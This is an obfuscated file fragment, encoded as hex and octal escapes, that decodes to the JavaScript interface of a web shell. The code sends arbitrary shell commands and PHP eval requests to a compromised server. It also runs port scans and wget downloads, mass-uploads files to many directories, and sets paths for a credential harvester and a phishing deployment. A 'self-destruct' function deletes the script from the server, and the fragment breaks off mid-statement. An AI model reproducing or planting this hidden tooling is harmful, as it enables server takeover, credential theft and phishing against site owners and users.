0\x24\x7b\164\150\x69\163\x2e\150\x6f\x73\164\x6e\141\x6d\145\x7d\74\57\163\160\141\156\x3e\72\74\x73\160\x61\156\x20\x73\164\171\x6c\145\75\42\143\x6f\154\x6f\162\x3a\x76\x61\x72\x28\55\55\141\x63\x63\x65\x6e\164\55\142\x6c\165\x65\x29\73\x22\76\x24\173\x74\x68\151\x73\x2e\143\x77\x64\175\74\x2f\x73\x70\141\156\x3e\74\163\160\x61\x6e\40\x73\x74\171\154\145\x3d\x22\143\157\154\x6f\162\x3a\x76\141\162\50\55\55\141\143\x63\145\156\164\55\x67\157\x6c\144\x29\73\40\x6d\141\x72\x67\x69\x6e\72\x30\40\x35\x70\170\x3b\42\76\x24\74\x2f\163\x70\141\x6e\76\x3c\x73\160\141\x6e\x3e\x24\x7b\143\x6d\x64\x2e\x72\145\x70\154\141\x63\145\x28\57\x26\57\147\x2c\x20\42\x26\x61\x6d\160\73\42\x29\x2e\162\x65\160\x6c\x61\x63\x65\50\57\74\x2f\147\x2c\40\42\46\154\164\x3b\42\51\x2e\x72\x65\160\x6c\x61\x63\x65\50\x2f\76\57\x67\54\x20\x22\46\147\x74\x3b\42\51\175\x3c\57\163\x70\141\156\76\x60\51\x3b\xa\x20\11\11\x9\x9\151\156\160\165\x74\x2e\x76\x61\x6c\165\x65\x20\75\40\47\47\x3b\x20\x69\146\x20\50\x63\x6d\x64\56\164\x72\151\x6d\x28\51\x20\75\x3d\x3d\x20\47\143\x6c\145\141\x72\47\x29\40\173\40\x63\157\x6e\x73\164\40\x74\x65\162\155\117\165\164\160\x75\164\40\75\40\x64\157\x63\165\x6d\x65\156\x74\56\x67\x65\x74\105\154\x65\155\x65\x6e\164\102\171\x49\144\x28\x27\x74\x65\162\155\x2d\x6f\165\x74\160\165\x74\x27\x29\x3b\x20\x69\x66\x20\50\x74\145\x72\155\117\165\164\160\165\x74\x29\40\x74\145\162\x6d\x4f\165\164\x70\x75\x74\56\151\156\156\x65\162\110\x54\x4d\114\40\75\x20\47\47\73\40\162\145\x74\165\162\156\73\x20\175\12\x20\x9\11\x9\11\143\157\x6e\163\x74\40\x72\145\x73\x20\x3d\40\x61\x77\x61\x69\164\x20\164\150\x69\x73\56\x61\160\151\50\x27\145\x78\x65\143\x27\54\x20\x7b\40\143\155\144\x20\x7d\51\73\12\x20\11\11\11\11\151\x66\50\x72\x65\x73\x20\46\x26\x20\162\x65\163\x2e\163\164\141\164\165\x73\40\75\75\x3d\40\47\163\x75\143\143\x65\x73\163\47\x29\173\40\x74\x68\151\x73\56\141\x70\x70\x65\x6e\x64\124\x65\162\x6d\x69\x6e\141\154\x4f\165\164\160\165\164\x28\x72\x65\x73\x2e\157\165\x74\160\165\x74\x29\x3b\40\164\150\151\x73\56\143\167\x64\x20\75\x20\x72\x65\x73\56\x63\x77\x64\x3b\40\x74\x68\151\163\56\165\x70\144\141\164\x65\x54\x65\x72\155\151\156\x61\x6c\x50\162\x6f\x6d\x70\x74\50\x29\73\x20\143\157\x6e\163\x74\40\x63\x77\x64\105\x6c\x20\x3d\40\144\x6f\143\165\x6d\145\x6e\x74\x2e\x67\145\164\105\x6c\145\x6d\145\x6e\x74\x42\x79\x49\x64\50\47\143\167\144\47\x29\73\40\x69\x66\x20\x28\143\167\144\105\154\x29\40\x63\167\x64\x45\x6c\x2e\x76\141\154\165\145\x20\x3d\x20\164\150\x69\x73\56\x63\x77\x64\x3b\40\x63\x6f\156\x73\164\x20\146\151\x6c\145\163\x56\151\x65\167\x20\x3d\x20\x64\x6f\143\165\x6d\x65\156\x74\x2e\x67\x65\x74\x45\154\145\x6d\x65\156\x74\x42\x79\x49\x64\x28\x27\166\x69\x65\x77\55\146\151\x6c\x65\163\x27\x29\73\x20\151\x66\40\50\146\151\x6c\x65\x73\126\x69\145\167\x20\x26\x26\40\146\x69\x6c\x65\163\126\x69\x65\x77\x2e\x73\x74\x79\x6c\x65\56\x64\x69\x73\x70\x6c\x61\x79\40\75\75\75\40\x27\x66\154\145\170\47\x29\x20\173\x20\164\150\x69\163\x2e\x6c\157\141\144\x46\151\154\145\x73\50\x74\150\x69\x73\x2e\x63\167\144\x29\x3b\x20\175\x20\175\12\x20\x9\x9\x9\x7d\73\xa\x20\11\11\x9\x69\146\40\50\x65\x2e\153\x65\171\40\75\x3d\75\x20\x27\105\156\x74\145\x72\47\40\x26\x26\x20\x69\x6e\x70\x75\164\56\166\x61\154\x75\145\x29\x20\173\40\150\x61\156\x64\154\145\103\155\x64\x28\51\x3b\40\x7d\12\40\11\x9\x9\x65\154\x73\x65\40\x69\x66\40\x28\145\56\x6b\x65\x79\x20\x3d\x3d\x3d\40\x27\x41\162\x72\157\167\x55\160\47\51\40\173\x20\145\x2e\x70\162\145\166\x65\156\x74\x44\145\x66\x61\165\x6c\164\50\x29\73\x20\x69\146\50\164\x68\151\x73\56\x68\x69\163\x74\157\x72\x79\x49\x6e\x64\145\x78\40\74\40\164\150\x69\163\x2e\150\151\163\164\157\162\x79\x2e\154\x65\x6e\x67\x74\150\40\x2d\40\61\x29\x20\173\40\164\x68\x69\x73\56\150\x69\163\x74\x6f\162\x79\x49\x6e\x64\x65\170\x2b\53\x3b\40\151\x6e\160\x75\x74\x2e\166\141\x6c\165\145\x20\x3d\x20\164\150\x69\x73\56\150\x69\x73\164\x6f\162\x79\133\164\x68\151\163\x2e\x68\151\x73\164\157\162\171\x49\156\144\145\170\x5d\73\40\175\x20\175\xa\40\11\x9\11\145\154\x73\x65\x20\x69\x66\x20\x28\x65\56\153\145\171\40\x3d\75\x3d\x20\47\x41\162\x72\x6f\167\104\157\167\x6e\47\51\40\173\40\145\x2e\x70\162\145\166\x65\x6e\164\104\145\146\141\x75\x6c\x74\50\51\73\40\x69\146\x28\x74\150\151\163\x2e\x68\x69\163\164\x6f\x72\171\111\156\144\145\170\40\76\40\x30\51\40\x7b\40\x74\x68\x69\x73\56\150\x69\x73\x74\x6f\x72\171\111\x6e\x64\145\170\x2d\x2d\73\x20\151\156\160\165\x74\56\x76\141\x6c\x75\145\x20\75\x20\x74\150\x69\x73\56\150\x69\x73\x74\x6f\162\171\133\164\150\x69\163\x2e\150\x69\x73\164\x6f\x72\x79\x49\x6e\144\x65\x78\x5d\x3b\40\x7d\x20\145\154\x73\145\x20\173\40\x74\x68\x69\163\56\150\x69\163\164\x6f\x72\x79\111\156\144\145\170\x20\75\40\x2d\61\73\40\x69\156\x70\165\x74\56\166\141\x6c\165\x65\40\x3d\x20\x27\47\73\40\x7d\x20\x7d\12\x20\x9\11\175\54\12\40\11\11\x61\x70\x70\145\156\144\124\145\162\x6d\151\x6e\x61\154\117\165\x74\x70\165\164\x28\164\145\x78\x74\51\x20\x7b\40\143\x6f\x6e\163\x74\40\145\154\x20\75\40\144\x6f\x63\165\x6d\145\x6e\x74\56\147\145\164\105\154\145\x6d\145\x6e\x74\x42\171\111\144\x28\x27\x74\x65\162\155\55\x6f\x75\164\x70\165\164\47\51\x3b\40\x69\146\x20\x28\145\x6c\51\x20\x7b\x20\145\x6c\x2e\151\x6e\156\x65\162\x48\x54\x4d\114\x20\x2b\75\x20\164\145\170\x74\x2e\162\x65\x70\x6c\x61\143\x65\x28\57\134\x6e\57\147\54\x20\x27\74\142\x72\x3e\x27\51\40\53\40\x27\74\x62\x72\76\47\73\x20\x65\x6c\56\x73\143\162\157\x6c\154\x54\157\x70\x20\75\x20\x65\x6c\x2e\x73\x63\x72\157\x6c\x6c\x48\x65\151\x67\150\164\73\40\175\x20\x7d\x2c\xa\x20\x9\x9\165\160\x64\x61\x74\145\124\x65\162\x6d\x69\156\x61\x6c\120\x72\157\x6d\x70\x74\50\x29\x20\173\x20\12\11\11\11\143\x6f\156\163\164\x20\x73\x61\146\x65\123\145\164\40\75\40\x28\151\x64\54\40\166\141\154\x75\145\x2c\40\x70\x72\x6f\160\x20\x3d\40\x27\151\156\156\x65\162\124\x65\170\164\47\x29\x20\x3d\76\x20\173\x20\143\x6f\x6e\163\x74\x20\145\x6c\40\x3d\40\144\157\143\x75\x6d\145\156\164\x2e\x67\145\x74\x45\154\x65\155\145\x6e\164\102\171\x49\144\50\x69\x64\x29\73\40\x69\x66\40\50\x65\x6c\51\40\145\x6c\133\x70\162\157\x70\x5d\40\x3d\x20\x76\141\154\165\x65\73\40\175\x3b\12\11\11\11\163\141\x66\145\123\x65\x74\x28\47\x74\x65\x72\x6d\x2d\165\163\145\x72\55\x68\157\x73\x74\x27\x2c\40\x60\x24\173\164\150\151\x73\x2e\165\x73\x65\x72\175\x40\x24\173\x74\x68\x69\163\x2e\x68\157\x73\x74\x6e\141\155\x65\x7d\140\x29\x3b\xa\x9\x9\x9\163\x61\146\x65\x53\x65\164\x28\x27\164\145\162\x6d\55\x63\167\x64\x27\54\x20\164\150\151\163\56\x63\167\x64\51\x3b\12\11\x9\11\163\x61\146\x65\123\145\164\x28\x27\163\x65\x61\x72\x63\x68\x2d\x70\x61\164\150\47\x2c\x20\164\x68\151\x73\56\x63\167\144\54\x20\x27\166\x61\154\165\145\x27\x29\73\xa\11\11\11\x73\x61\x66\x65\123\145\164\x28\47\143\157\x6e\x74\x65\156\x74\55\x73\145\141\162\143\150\x2d\160\141\x74\x68\x27\x2c\40\164\150\151\x73\56\143\x77\x64\x2c\x20\47\166\x61\x6c\x75\145\47\x29\73\xa\11\x9\11\x73\141\146\145\123\x65\x74\50\x27\150\x74\x61\x63\x63\x65\x73\x73\x2d\160\141\164\150\47\54\x20\x74\x68\x69\163\x2e\143\167\144\x2c\40\47\x76\141\x6c\x75\145\x27\x29\x3b\12\x9\x9\x9\163\141\146\145\123\x65\x74\x28\47\167\x72\x69\164\141\x62\154\x65\55\163\143\x61\156\x2d\160\141\164\x68\x27\x2c\40\x74\150\x69\163\x2e\143\167\144\x2c\40\47\x76\141\154\165\145\x27\51\73\12\11\x9\11\x73\141\x66\x65\x53\145\164\x28\x27\x63\162\x65\144\x2d\x68\x61\x72\x76\x65\x73\x74\x65\x72\55\160\x61\164\150\x27\54\40\164\x68\151\163\56\143\x77\144\54\40\x27\166\x61\154\x75\145\x27\x29\x3b\12\x9\x9\x9\x73\x61\146\145\x53\145\164\50\x27\x70\150\151\163\x68\x2d\x64\145\x70\x6c\157\x79\55\x70\141\x74\x68\47\54\40\164\x68\x69\163\x2e\143\x77\144\54\x20\47\x76\x61\x6c\165\145\47\x29\73\xa\x9\11\175\x2c\12\x20\x9\11\141\163\171\x6e\x63\x20\x72\165\x6e\105\x76\141\x6c\x28\x29\40\x7b\40\143\x6f\x6e\163\x74\x20\162\x65\163\x20\75\40\x61\167\141\151\164\40\164\x68\x69\163\56\141\x70\151\50\x27\160\x68\x70\x5f\x65\166\x61\x6c\47\x2c\x20\173\x20\143\x6f\144\x65\x3a\40\144\x6f\143\x75\155\145\156\x74\x2e\147\x65\164\x45\x6c\145\155\145\156\x74\x42\171\111\x64\x28\x27\x65\166\x61\154\55\x63\x6f\x64\x65\x27\51\x2e\x76\141\x6c\x75\x65\x20\x7d\51\x3b\40\151\x66\40\x28\x72\x65\x73\56\163\x74\x61\x74\x75\x73\x20\75\x3d\x3d\x20\47\163\165\143\x63\x65\163\x73\x27\x29\40\x64\157\143\165\155\145\x6e\164\56\x67\x65\x74\105\x6c\145\x6d\x65\x6e\164\x42\171\111\x64\x28\x27\145\166\x61\x6c\x2d\157\165\164\x70\165\164\x27\51\56\x69\x6e\156\x65\162\124\145\170\x74\40\x3d\x20\162\x65\x73\x2e\157\x75\164\160\x75\x74\x3b\40\x7d\54\xa\40\x9\x9\x61\163\171\x6e\143\x20\163\164\141\162\x74\120\x6f\162\164\123\143\x61\156\x28\x29\x20\x7b\xa\x20\x9\x9\x9\x63\x6f\156\x73\x74\x20\x68\157\x73\164\40\x3d\40\144\157\x63\165\155\x65\156\x74\56\147\x65\164\x45\154\x65\x6d\145\156\x74\102\171\111\x64\50\47\x73\143\x61\156\55\150\x6f\163\x74\47\51\x2e\x76\141\154\165\x65\54\40\x70\157\162\x74\x73\x20\75\x20\144\x6f\x63\165\155\145\156\164\x2e\147\x65\164\x45\x6c\145\x6d\x65\156\164\102\x79\111\144\50\47\x73\x63\141\x6e\x2d\x70\157\x72\x74\163\x27\x29\56\x76\x61\154\x75\x65\54\x20\x72\x65\x73\x75\x6c\164\163\105\154\40\x3d\40\144\157\x63\x75\x6d\145\x6e\x74\56\147\x65\x74\105\154\x65\155\145\156\x74\102\171\x49\144\50\47\x73\143\141\156\55\x72\x65\163\165\x6c\x74\163\47\51\x3b\40\x69\146\40\50\x21\x68\157\x73\164\40\x7c\x7c\40\x21\160\157\162\x74\x73\51\40\162\x65\164\165\x72\x6e\x20\164\x68\x69\163\x2e\164\157\141\163\x74\x28\x27\x48\x6f\x73\164\x20\141\156\x64\40\120\x6f\162\164\163\x20\141\162\145\x20\x72\x65\161\x75\x69\162\x65\x64\56\47\x2c\x20\47\145\x72\162\157\162\x27\51\73\12\40\11\11\x9\162\145\x73\x75\154\x74\x73\x45\154\56\x69\156\156\x65\162\x54\145\170\164\40\75\40\140\123\x63\141\x6e\156\151\x6e\x67\40\x24\173\x68\157\163\164\x7d\56\56\x2e\x60\73\x20\143\x6f\156\x73\x74\x20\x72\145\x73\40\75\40\141\167\x61\151\x74\x20\164\150\151\163\56\x61\x70\151\x28\47\x70\157\x72\x74\x5f\163\143\141\x6e\47\54\40\173\x20\150\157\163\164\x2c\x20\x70\157\162\164\x73\40\175\x29\73\xa\x20\11\11\x9\x69\146\x20\50\x72\x65\163\56\163\x74\x61\164\165\x73\x20\75\75\x3d\x20\x27\x73\x75\143\x63\145\x73\x73\x27\x29\x20\173\40\162\x65\x73\x75\x6c\x74\x73\x45\154\56\x69\156\x6e\145\162\x54\x65\x78\x74\40\x3d\40\x60\x53\x63\141\156\40\x72\145\x73\165\x6c\164\x73\40\x66\157\x72\40\x24\173\150\x6f\x73\164\x7d\x3a\x5c\156\x60\40\x2b\x20\117\142\152\x65\143\x74\56\145\x6e\164\162\151\145\163\x28\162\x65\163\56\x72\x65\163\x75\154\x74\x73\x29\56\155\x61\160\x28\x28\x5b\160\157\x72\x74\54\x20\163\x74\141\x74\x75\163\135\51\x20\x3d\x3e\x20\x60\120\157\x72\164\x20\44\173\160\x6f\x72\164\175\72\40\44\173\163\x74\141\x74\x75\x73\x7d\x60\51\x2e\152\x6f\x69\156\x28\47\134\x6e\47\51\x3b\40\175\xa\40\11\11\x7d\54\12\x20\x9\x9\141\x73\171\156\143\x20\x72\165\x6e\127\147\145\164\50\51\x20\173\40\143\x6f\156\x73\164\x20\x75\x72\154\x20\x3d\x20\144\x6f\x63\165\155\145\156\164\56\147\x65\x74\105\154\145\x6d\145\156\164\x42\171\111\x64\50\x27\x77\147\x65\x74\x2d\x75\162\x6c\47\51\56\166\x61\x6c\x75\145\x3b\x20\151\146\x20\x28\165\x72\154\51\40\x7b\40\143\x6f\x6e\163\164\x20\162\145\163\40\x3d\x20\x61\167\x61\151\164\40\164\150\151\x73\x2e\x61\160\x69\x28\x27\167\147\145\x74\47\x2c\40\x7b\x20\x75\162\x6c\40\x7d\x29\73\40\x69\x66\40\50\x72\145\163\x2e\163\x74\141\164\165\x73\x20\x3d\x3d\x3d\x20\x27\163\x75\x63\x63\145\163\163\47\x29\40\173\x20\x74\x68\151\163\x2e\x74\x6f\141\163\x74\50\x72\x65\163\x2e\x6d\x65\163\x73\141\147\145\51\x3b\40\151\x66\x20\50\144\157\143\165\x6d\145\x6e\x74\56\x67\145\x74\x45\154\x65\155\x65\156\164\x42\x79\111\144\50\47\166\151\x65\167\55\146\151\x6c\x65\163\x27\51\56\163\x74\x79\x6c\145\x2e\x64\151\163\x70\154\141\171\x20\75\x3d\x3d\x20\47\146\x6c\145\x78\47\x29\40\x74\x68\151\x73\x2e\x6c\157\x61\144\106\x69\x6c\145\x73\50\164\x68\151\x73\56\x63\167\x64\51\73\x20\x7d\x20\x7d\x20\x7d\54\xa\x20\x9\11\x61\163\171\x6e\143\x20\x73\x65\x6c\146\104\145\x73\164\x72\165\143\x74\x28\x29\x20\x7b\x20\x63\x6f\x6e\x73\164\40\x63\x6f\x6e\x66\x69\162\x6d\145\144\x20\x3d\x20\141\x77\141\151\x74\40\x74\150\x69\163\x2e\163\150\157\x77\x43\157\x6e\x66\x69\162\x6d\115\157\x64\x61\x6c\50\x22\x44\x41\116\107\x45\x52\72\40\x54\x68\x69\163\x20\x61\143\x74\151\x6f\x6e\40\151\163\40\151\162\162\x65\166\145\162\163\x69\142\x6c\145\40\141\x6e\144\x20\x77\x69\x6c\x6c\x20\x70\x65\x72\155\141\x6e\x65\156\x74\x6c\171\x20\x64\145\x6c\145\x74\x65\40\164\x68\151\x73\x20\163\143\162\x69\x70\164\x20\x66\162\x6f\155\x20\164\x68\145\40\163\x65\162\x76\x65\x72\x2e\x3c\142\162\x3e\74\142\x72\x3e\x41\162\145\40\x79\x6f\165\40\x61\142\x73\157\154\x75\x74\145\154\171\40\x73\x75\162\145\77\42\54\x20\173\x20\x74\171\x70\x65\x3a\x20\47\144\x61\156\x67\x65\x72\x27\x2c\x20\157\153\124\145\170\164\x3a\40\47\123\x65\x6c\146\x2d\x44\145\163\x74\x72\x75\x63\x74\47\x2c\40\x63\x61\x6e\x63\x65\x6c\124\145\170\164\x3a\40\x27\x43\x61\156\143\145\154\x27\x20\175\x29\x3b\40\151\146\40\50\143\x6f\x6e\146\x69\x72\x6d\x65\144\x29\40\173\x20\143\x6f\156\163\164\40\162\x65\x73\40\75\40\x61\x77\141\x69\x74\x20\164\150\151\163\x2e\141\160\x69\50\47\163\x65\x6c\146\x5f\x64\x65\x73\x74\x72\x75\143\164\47\x29\73\x20\x74\x68\151\163\x2e\164\x6f\141\x73\164\50\x72\x65\x73\56\x6d\x65\x73\x73\x61\147\x65\x2c\x20\162\x65\x73\56\x73\x74\141\x74\x75\163\x29\73\40\x69\x66\40\50\162\145\163\56\x73\x74\141\x74\x75\163\x20\x3d\x3d\x3d\40\47\x73\x75\x63\x63\x65\x73\163\47\51\40\x7b\40\x64\x6f\143\x75\155\x65\x6e\164\56\142\x6f\x64\171\56\151\156\156\x65\x72\x48\x54\x4d\114\40\x3d\40\140\74\x64\151\x76\40\163\x74\x79\154\x65\x3d\42\x74\x65\x78\x74\55\141\x6c\151\147\x6e\72\x63\x65\156\x74\x65\x72\73\40\x70\x61\144\144\151\x6e\147\x3a\x20\65\x72\x65\155\x3b\40\146\157\x6e\164\x2d\x73\x69\x7a\145\72\40\61\56\65\162\145\x6d\x3b\42\x3e\x3c\x68\61\x3e\x24\173\x72\145\x73\x2e\155\x65\x73\x73\x61\147\x65\175\x3c\57\150\x31\x3e\74\x70\x3e\x53\145\x6c\146\55\x64\x65\x73\x74\x72\165\143\164\40\x73\145\x71\x75\x65\156\x63\145\x20\x63\157\155\x70\x6c\x65\x74\x65\x64\56\x3c\57\x70\x3e\74\57\x64\x69\x76\x3e\140\73\40\175\x20\175\40\175\x2c\xa\40\x9\11\x61\x73\171\156\x63\x20\154\x6f\141\144\104\x69\162\124\162\145\x65\50\143\157\x6e\164\x61\x69\156\145\162\123\145\154\145\143\164\157\162\x29\40\173\xa\x20\11\11\x9\143\x6f\x6e\x73\164\40\x72\145\x73\40\75\x20\141\x77\x61\x69\x74\x20\x74\150\151\163\x2e\x61\160\151\50\47\147\x65\x74\137\x64\x69\162\x5f\164\162\x65\145\x27\x29\x3b\40\143\157\156\163\x74\40\x63\157\156\164\141\151\x6e\x65\162\40\x3d\x20\144\x6f\143\x75\155\x65\156\164\56\161\165\145\162\171\x53\x65\x6c\145\143\x74\x6f\162\x28\143\x6f\x6e\164\x61\151\156\x65\162\123\x65\154\x65\x63\x74\157\162\51\x3b\xa\x20\11\11\x9\151\146\x20\x28\162\145\163\x20\x26\x26\40\x72\x65\x73\x2e\163\x74\141\x74\x75\163\40\75\75\x3d\x20\x27\x73\165\143\143\x65\163\x73\47\51\40\173\x20\x63\x6f\156\164\x61\151\156\145\x72\56\x69\156\x6e\x65\x72\x48\124\115\114\40\75\x20\x27\47\73\x20\x63\x6f\x6e\x74\141\151\x6e\x65\x72\x2e\143\x6c\141\163\163\x4c\x69\x73\164\56\x61\x64\144\50\x27\144\x69\x72\x2d\x74\162\x65\145\47\51\73\40\x63\157\156\x73\x74\40\x72\157\x6f\x74\x55\154\x20\75\40\144\x6f\143\x75\x6d\x65\x6e\164\56\143\162\145\x61\x74\x65\105\x6c\x65\x6d\x65\x6e\164\x28\47\165\x6c\47\51\x3b\x20\162\x6f\x6f\x74\x55\154\56\163\x74\171\154\145\56\x70\x61\144\x64\151\x6e\x67\x4c\x65\146\164\40\75\40\x27\60\x27\x3b\x20\162\x6f\x6f\x74\125\154\x2e\141\x70\x70\145\156\x64\x43\150\151\x6c\x64\x28\x74\x68\x69\163\56\x72\145\156\x64\x65\x72\x44\x69\162\x54\x72\x65\x65\116\x6f\x64\x65\50\162\x65\x73\56\164\162\145\145\x5b\60\x5d\x29\x29\73\40\143\x6f\x6e\x74\141\151\x6e\x65\162\56\x61\160\x70\x65\156\x64\103\150\151\154\x64\x28\162\157\157\x74\x55\x6c\x29\x3b\40\143\x6f\x6e\x74\x61\151\156\x65\162\56\141\144\144\105\x76\145\156\x74\114\x69\x73\164\145\x6e\145\162\50\x27\x63\154\x69\x63\153\47\54\x20\x65\40\x3d\76\x20\173\40\x69\x66\x20\x28\x65\x2e\164\141\162\147\x65\x74\56\x63\154\141\x73\x73\114\151\163\164\56\x63\157\156\x74\141\x69\x6e\163\50\x27\x64\x69\x72\x2d\164\162\x65\145\x2d\156\157\x64\x65\x27\51\x29\x20\x7b\40\143\x6f\156\163\x74\40\x73\165\142\154\x69\x73\164\40\75\x20\x65\56\x74\x61\x72\x67\145\x74\x2e\x63\154\x6f\163\145\163\x74\50\47\154\x69\x27\x29\x2e\161\165\145\x72\x79\x53\x65\x6c\145\x63\164\x6f\162\x28\47\165\154\x27\x29\x3b\40\x69\x66\40\50\x73\165\x62\154\151\x73\x74\x29\40\x7b\40\163\x75\142\x6c\x69\163\164\56\163\164\x79\x6c\145\x2e\x64\151\163\x70\x6c\x61\171\40\x3d\x20\x73\x75\142\x6c\151\x73\x74\x2e\163\x74\x79\x6c\145\x2e\x64\151\x73\160\x6c\141\171\40\x3d\x3d\75\40\47\x6e\157\156\145\47\40\77\40\47\x62\154\157\143\x6b\x27\x20\72\40\x27\x6e\157\156\145\x27\x3b\40\x65\56\164\141\x72\147\145\x74\56\143\154\x61\x73\163\x4c\151\x73\x74\x2e\x74\157\147\x67\x6c\x65\50\x27\143\x6f\154\154\141\x70\163\x65\144\x27\x29\x3b\x20\175\x20\x7d\x20\175\x29\73\40\x7d\40\x65\154\163\x65\40\x7b\x20\x63\x6f\x6e\x74\141\151\x6e\145\x72\56\151\x6e\156\x65\x72\110\124\115\x4c\40\x3d\40\47\74\160\x20\163\x74\x79\x6c\145\x3d\42\143\157\x6c\x6f\162\x3a\166\141\162\x28\x2d\x2d\x61\143\143\145\x6e\x74\x2d\162\x65\144\x29\73\x22\76\x46\141\151\x6c\145\144\x20\x74\x6f\x20\x6c\x6f\141\144\x20\x64\151\x72\145\143\164\x6f\162\x79\x20\164\162\145\145\x2e\74\57\160\x3e\47\73\x20\x7d\xa\x20\x9\x9\x7d\54\12\40\11\x9\162\x65\x6e\x64\x65\162\104\151\162\124\162\x65\145\x4e\x6f\144\145\x28\156\x6f\144\145\51\x20\173\xa\40\11\x9\x9\x63\157\156\x73\x74\x20\x6c\x69\40\x3d\x20\x64\157\x63\165\x6d\145\156\164\56\143\162\x65\141\x74\145\x45\154\145\x6d\145\156\164\50\x27\x6c\151\x27\x29\x3b\x20\143\x6f\x6e\163\164\40\x6c\x61\x62\145\154\x20\75\40\x64\x6f\143\165\155\x65\x6e\x74\56\143\x72\x65\141\x74\145\x45\x6c\145\155\x65\156\164\x28\47\154\141\x62\x65\154\x27\x29\73\x20\143\157\156\163\x74\x20\143\x68\145\x63\x6b\142\157\x78\x20\x3d\40\144\x6f\x63\x75\x6d\145\x6e\x74\56\143\162\145\141\164\x65\x45\x6c\x65\x6d\x65\156\x74\50\x27\x69\x6e\x70\165\x74\x27\x29\73\12\x20\11\x9\11\143\x68\145\x63\x6b\142\157\170\56\164\x79\x70\x65\x20\75\x20\47\x63\150\x65\x63\x6b\x62\157\170\47\x3b\40\x63\150\x65\143\x6b\x62\x6f\x78\56\x76\x61\154\x75\x65\40\x3d\40\156\x6f\144\x65\x2e\160\141\x74\x68\x3b\x20\154\141\x62\145\154\56\x61\x70\x70\145\x6e\x64\x43\x68\151\x6c\x64\x28\x63\150\x65\143\153\142\x6f\170\x29\73\x20\143\x6f\156\163\x74\x20\x73\160\141\x6e\40\75\40\x64\x6f\143\x75\155\145\156\x74\56\x63\162\145\141\164\145\x45\154\x65\x6d\145\156\164\50\x27\x73\160\141\x6e\x27\51\73\xa\40\x9\x9\x9\163\160\x61\x6e\56\164\x65\x78\164\103\x6f\156\x74\x65\156\x74\x20\x3d\40\47\x20\x27\x20\x2b\40\156\x6f\x64\x65\x2e\156\x61\155\145\x3b\40\154\x61\x62\145\x6c\x2e\141\x70\x70\x65\156\x64\103\150\x69\154\x64\50\163\160\x61\156\51\73\40\x6c\x69\x2e\141\160\160\145\156\x64\x43\150\151\154\144\x28\154\x61\x62\x65\x6c\x29\73\xa\x20\x9\11\x9\151\146\x20\x28\156\157\x64\x65\x2e\x63\150\x69\x6c\x64\x72\145\x6e\40\46\x26\x20\x6e\x6f\x64\x65\x2e\143\x68\x69\x6c\144\162\x65\156\x2e\x6c\145\156\147\164\x68\40\x3e\40\x30\51\x20\x7b\x20\x73\x70\x61\x6e\56\x63\154\141\163\x73\x4e\141\x6d\x65\x20\75\40\x27\144\151\162\55\164\162\145\x65\55\x6e\157\x64\145\40\x63\157\154\154\141\x70\163\145\144\x27\x3b\x20\143\157\156\163\x74\40\x75\154\40\75\40\x64\157\x63\x75\155\x65\x6e\x74\56\x63\x72\x65\141\x74\145\105\154\x65\x6d\145\156\164\50\47\165\154\x27\51\x3b\x20\165\154\56\x73\x74\x79\154\145\56\144\151\x73\160\154\141\171\40\75\40\47\x6e\x6f\x6e\145\47\x3b\40\156\x6f\x64\x65\x2e\x63\x68\151\154\x64\162\x65\x6e\x2e\146\x6f\x72\x45\141\143\150\50\x63\150\151\x6c\144\x20\75\x3e\x20\165\154\56\x61\160\x70\x65\x6e\x64\103\150\x69\154\144\x28\x74\x68\151\163\x2e\162\x65\156\144\145\x72\104\151\162\x54\162\145\x65\116\157\x64\x65\x28\x63\150\151\x6c\x64\x29\51\x29\x3b\40\154\151\56\x61\160\x70\145\x6e\144\103\150\151\154\144\50\x75\x6c\51\73\40\175\12\x20\x9\x9\11\x72\x65\x74\x75\162\156\x20\154\x69\73\12\x20\11\11\175\x2c\12\x20\11\11\141\163\171\x6e\143\40\x72\165\x6e\115\141\x73\x73\x55\x70\x6c\x6f\x61\144\x28\51\40\x7b\xa\x20\11\x9\11\143\157\156\x73\x74\40\146\x69\x6c\145\111\x6e\x70\165\164\40\x3d\x20\144\x6f\143\x75\x6d\145\x6e\164\x2e\x67\145\164\105\x6c\145\155\145\156\164\x42\171\x49\x64\x28\47\x6d\141\163\163\55\x75\160\x6c\x6f\x61\x64\55\x69\x6e\160\x75\x74\x27\x29\73\x20\x63\x6f\x6e\x73\164\40\x66\x69\154\x65\40\x3d\40\146\151\x6c\x65\111\x6e\x70\x75\164\56\x66\151\154\x65\163\x5b\x30\135\x3b\x20\x69\x66\40\x28\41\146\151\x6c\145\x29\40\162\145\164\x75\x72\156\x20\164\x68\151\163\x2e\x74\157\141\163\164\50\x27\x50\x6c\145\141\x73\x65\40\x73\x65\154\x65\143\x74\40\141\40\146\151\154\145\x20\164\x6f\40\x75\160\x6c\157\x61\x64\56\x27\x2c\40\47\145\x72\162\x6f\x72\47\x29\73\xa\x20\11\11\x9\143\x6f\156\x73\x74\x20\163\145\x6c\x65\143\164\145\x64\x44\x69\x72\x73\x20\75\x20\101\162\162\x61\171\x2e\146\162\157\155\50\144\x6f\143\165\155\x65\156\x74\56\x71\x75\145\x72\171\x53\145\154\x65\x63\x74\x6f\162\x41\x6c\x6c\x28\x27\x23\144\x69\x72\x2d\x74\162\x65\145\55\143\x6f\156\164\x61\x69\156\145\x72\40\151\x6e\x70\x75\x74\x3a\x63\150\145\x63\x6b\145\144\x27\x29\x29\x2e\x6d\141\160\50\x63\x62\x20\75\x3e\x20\143\x62\x2e\x76\141\x6c\x75\145\x29\73\40\x69\x66\40\x28\163\145\154\x65\143\x74\145\x64\x44\151\x72\x73\56\x6c\145\156\147\x74\150\40\75\75\75\x20\60\x29\x20\162\x65\x74\165\x72\156\x20\x74\150\x69\163\x2e\x74\157\141\163\164\50\47\120\154\x65\x61\163\x65\40\163\x65\154\x65\x63\164\x20\x61\x74\40\154\x65\x61\x73\164\40\x6f\x6e\145\x20\144\151\162\145\143\x74\157\x72\171\56\x27\54\40\47\145\x72\x72\x6f\x72\47\x29\73\12\40\11\11\11\164\x68\151\x73\x2e\x74\157\x61\x73\x74\x28\x60\125\x70\154\x6f\141\144\x69\156\147\x20\x22\x24\173\x66\151\x6c\x65\x2e\156\141\155\x65\175\x22\x20\164\157\40\x24\173\163\145\154\x65\x63\x74\x65\x64\104\x69\162\x73\56\154\145\x6e\x67\164\150\x7d\40\x6c\157\x63\141\x74\x69\157\x6e\x73\56\56\56\140\x29\73\40\x63\157\156\163\164\40\x66\x6f\x72\155\104\x61\x74\x61\40\x3d\x20\x6e\145\x77\40\106\x6f\x72\x6d\104\x61\164\141\x28\51\73\xa\x20\11\11\x9\x66\157\x72\x6d\x44\x61\